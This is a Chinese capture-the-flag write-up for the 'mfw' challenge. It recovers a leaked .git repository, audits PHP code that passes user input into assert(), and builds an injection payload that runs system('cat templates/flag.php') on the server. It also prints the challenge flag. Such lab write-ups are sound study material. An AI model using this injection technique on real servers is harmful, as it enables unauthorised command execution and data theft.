攻防世界:mfw[WriteUP]

根据题目提示考虑是git库泄露

这里在地址栏后加.git也可以验证是git库泄露


使用GitHack工具对git库进行恢复重建

在templates目录下存在flag.php文件,但里面并没有flag

有内容的只有主目录下的index.php

index.php源码:

php 复制代码
<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<title>My PHP Website</title>
		
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
	</head>
	<body>
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<div class="container">
		    	<div class="navbar-header">
		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
		            	<span class="sr-only">Toggle navigation</span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		          	</button>
		          	<a class="navbar-brand" href="#">Project name</a>
		        </div>
		        <div id="navbar" class="collapse navbar-collapse">
		          	<ul class="nav navbar-nav">
		            	<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
		            	<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
		            	<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
						<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
		          	</ul>
		        </div>
		    </div>
		</nav>
		
		<div class="container" style="margin-top: 50px">
			<?php
				require_once $file;
			?>
			
		</div>
		
		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
		<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
	</body>
</html>

提取需要审计的PHP代码

代码审计:

复制代码
<?php

if (isset($_GET['page'])) {    //判断$page是否存在
	$page = $_GET['page'];    //存在就以get方法取值
} else {
	$page = "home";    //不存在就将"home"赋值给新建$page
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//assert函数返回值如果不为true则执行die命令则PHP脚本终止运行
//所以我们可以构造一个$file使其直接执行系统命令并加上注释符把判断".."的部分注释掉并即可


// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
//判断$file文件是否存在,不存在直接终止脚本

?>

其中有一串关键代码:file = "templates/" . page . ".php";

我们通过前面的GitHack已知悉flag.php文件就在templates目录下

所以我们构造payload的时候使$page有cat flag.php命令就行


**重点:**assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

首先使strpos函数闭合,利用函数结构strpost**(',那么$file的前半部分应该是:')**

后面接上命令: or system('cat templates/flag.php'),再接上注释符://

如此这般,该条代码最后执行的效果应该是:【绿色部分被//注释】

assert("strpos('') or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");

strpost('')参数为空时返回false,所以直接执行or后面的代码

最后构造payload:URL/?page=') or system('cat templates/flag.php');//


flag:cyberpeace{a97ae1229c2668130daa2f0f432fdd1b}

相关推荐
其实防守也摸鱼14 小时前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
学逆向的18 小时前
汇编——数据存储模式
开发语言·汇编·网络安全
阿米亚波21 小时前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发
txg6661 天前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
Chengbei111 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
2301_780303902 天前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
学逆向的2 天前
汇编——内存
开发语言·汇编·算法·网络安全
学逆向的2 天前
汇编——位运算
开发语言·汇编·算法·网络安全
数据知道2 天前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
福来阁86号技师2 天前
2026-now 网络安全笔记
网络安全·ctf·awd